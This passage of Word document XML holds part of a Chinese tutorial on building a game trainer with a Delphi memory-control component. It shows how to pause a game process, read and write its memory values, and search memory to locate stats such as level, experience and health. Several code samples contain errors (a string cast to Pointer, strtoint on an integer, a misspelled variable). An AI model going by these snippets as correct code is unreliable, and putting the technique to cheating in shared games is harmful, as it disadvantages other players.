    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MpMemCtl1.pauseProc(0); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MpMemCtl1.pauseProc(1); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复暂停</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　三、读写内存值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　游戏属性其实寄存在内存地址值里，游戏中要了解或修改游戏属性，可以通过对内存地值的读出或写入完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过控件，要读写内存地址值很容易。可以通过调用控件提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setAddressValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）两个方法即可，在使用方法之前，要确认的是要给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性进行附值，因为对内存的操作必须基于进程。给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性附值的方法，在上文中已经介绍。无论是对内存值进行读还是进行写，都要明确所要操作的内存地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressValue( //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取内存方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aAddress:pointer; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作的内存地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var aValue:integer //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读出的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>):Boolean;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setAddressValue( //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入内存方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aAddress:pointer; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作的内存地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>aValue:integer //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">):Boolean; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　要注意的是，传入内存地址时，内存地址必须为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pointer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型。其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　读取地址值（如果“主角”等级所存放的地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4549632</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aValue:Integer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MpMemCtl1.getAddressValue(Pointer(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4549632</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">),aValue); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量里的值为内存地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[4549632]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　写入地址值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">MpMemCtl1.setAddressValue(Pointer(Strtoint(‘4549632’)),strtoint(87)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过该方法可以把要修改的内存地址值改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即把“主角”等级改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　四、内存地址值分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在游戏中要想要到游戏属性存放的内存地址，那么就对相应内存地址进行内存分析，经过分析以后才可得到游戏属性存放的人存地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　控件提供两种基于内存地址的分析方法。一种是按精确地址值进行搜索分析，另一种是按内存变化增减量进行搜索分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果很明确的知道当前想要修改的地址值，那么就用精确地址值进行搜索分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在游戏中，需要修改人物的经验值，那么首先要从游戏画面上获得经验值信息，如游戏人物当前经验值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要把经验值调高，那么这时候就需要对人物经验值在内存中搜索得到相应的内存地址，当然很可能在内存中地址值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的很多，第一次很可能搜索出若干个地址值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址。等待经验值再有所变化，如从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，再次进行搜索，那么从刚刚所搜索到的地址中，便可以进一步获得范围更少的内存地址，以此类推，那么最后可得到经验值具体存放的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　如要用控件来实现内存值精确搜索，其实方法很简单，只需要调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>用该控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）方法即可。但是在搜索之前要确认搜索的范围，正如前文中所说：“而程序创建时在线性地址的中保留</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4MB-2GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一段地址”，所以要搜索的地址应该是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4MB-2GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间，所以要把控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MaxAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，把控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MinAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。还有一个需要确认的是需要搜索的值，那么应该把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SearchValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性设置为当前搜索的值。如果需要显示搜索进度那么可以把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ShowGauge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性挂上一个相应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGauge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件（该控件为进度条控件）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>search(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isFirst:Boolean //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否是第一次进行搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">):Boolean </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在搜索分析时为了提高搜索效率、实现业务逻辑，那么需要传入一个参数，从而确认是否是第一次进行内存。其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>maxV:=1024*1024*1024;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>maxV:=2*MaxV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>minV:=4*1024*1024;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>V:=StrToInt(Edit1.Text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>with MpMemCtl1 do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MaxAddress:=maxV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MinAddress:=minV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SearchValue:=SeaarchV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ShowGauge:=Gauge1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Search(first)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if first then first:=false; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果不明确当前想要修改的地址值，只知道想要修改的值变大或变小，那么就按内存变化增减量进行搜索分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　如有些游戏的人物血值不显示出来，但要对人物血值进行修改，那么只有借助于内存量增减变化而进行搜索分析出该人物血值存放的地址。如果人物被怪物打了一下，那么人物血值就会减少，那么这时候就用减量进行搜索分析，如果人物吃了“血”人物血值就会增加，那么这时候就用增量进行搜索分析。经过不断搜索，最后会把范围放血值的内存地址给搜索出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　如要用控件来实现内存值精确搜索，其实方法很简单，只需要调用该控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>compare()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法即可。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MaxAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MinAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性设置上面章节中有详细介绍，在此不再重提。在此分析中不需要再指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SearchValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性。如果需要显示搜索进度那么可以把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ShowGauge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性挂上一个相应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TGauge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
